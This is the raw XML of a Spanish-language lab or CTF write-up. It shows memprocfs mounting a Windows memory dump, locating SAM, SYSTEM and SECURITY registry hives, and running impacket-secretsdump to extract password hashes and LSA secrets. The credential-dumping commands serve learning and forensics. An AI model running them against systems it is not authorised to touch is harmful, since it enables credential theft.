                      <a:ext cx="1247775" cy="127635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Navegamos hasta el directorio vacío desde nuestra shell y ahora si procedemos a correrla</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./memprocfs  -mount /home/jordy/Escritorio/freelancer/mountpoint -device ../MEMORY.DMP   -forensic 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2171700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="33" name="image23.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image23.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="57312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Ahora si tenemos acceso a el archivo DMP, si vamos a la carpeta podremos ver toda la informacion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="482600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4" name="image7.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image7.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="48260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Así que procedemos a buscar algo que nos ayude a obtener alguna credencia</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Después de mucho tiempo encontramos el directorio hive_files y en este se encuentra algunos archivos que nos puede dar alguna contraseña</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1587500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="43" name="image42.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image42.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="57312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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">El archivo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffd3067d935000-SAM-MACHINE_SAM.reghive</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> es un volcado específico de una parte del registro de Windows, extraído de la memoria en una dirección particular (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffd3067d935000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). Vamos a desglosar su significado:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bip2vjva9r6h" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Desglose del nombre del archivo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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0xffffd3067d935000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Esta parte del nombre representa una dirección de memoria hexadecimal de la que se extrajo el contenido.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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SAM-MACHINE_SAM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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SAM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Security Account Manager): Indica que el archivo contiene datos del Security Account Manager de Windows, que es una base de datos que almacena información de cuentas de usuario y contraseñas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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MACHINE_SAM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Sugiere que estos datos pertenecen a una sección específica del SAM relacionada con la máquina.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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.reghive</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">La extensión </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.reghive</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> indica que el archivo es un hive del registro de Windows. Un hive es una sección de la base de datos del registro que contiene información de configuración y de sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bs2cauntk5ig" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Contexto y uso</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D8">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Este archivo es muy específico y contiene información sensible sobre las cuentas de usuario y posiblemente contraseñas cifradas. El archivo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SAM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> es una parte crítica del registro de Windows, utilizada por el sistema operativo para gestionar la seguridad y las cuentas de usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">En este caso contamos con 3 archivos hive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1181100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="19" name="image12.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image12.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="573120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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Asi que podemos utilizar la herramienta </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-secretsdump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sí, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-secretsdump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> es una herramienta que forma parte de la suite Impacket, desarrollada por SecureAuth Corporation. Impacket es una colección de scripts y clases en Python para trabajar con protocolos de red. La herramienta </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">secretsdump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> se utiliza para extraer credenciales y secretos de sistemas Windows. Es especialmente útil en el ámbito de la seguridad informática y el análisis forense.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DD">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vl4pdkyrkyu5" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Funcionalidades de </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-secretsdump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">secretsdump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> permite extraer una variedad de datos sensibles de sistemas Windows, incluyendo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hashes de Contraseñas</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Extrae hashes de contraseñas LM (LAN Manager) y NTLM (NT LAN Manager) de cuentas de usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Secretos de LSA</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Obtiene secretos almacenados por el Servicio de Autenticación Local (LSA).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Datos de SAM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Extrae información de la base de datos del Security Account Manager (SAM).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Contraseñas en Texto Claro</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Puede obtener contraseñas en texto claro en ciertos casos, dependiendo de la configuración del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yse0xq3xkavs" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extracción desde archivos de hives</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Si tienes acceso a los archivos del sistema (por ejemplo, de una copia de seguridad o una imagen de disco), puedes usar </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">secretsdump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> para extraer información directamente desde estos archivos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copiar código</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Donde:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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SAM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SYSTEM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SECURITY</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
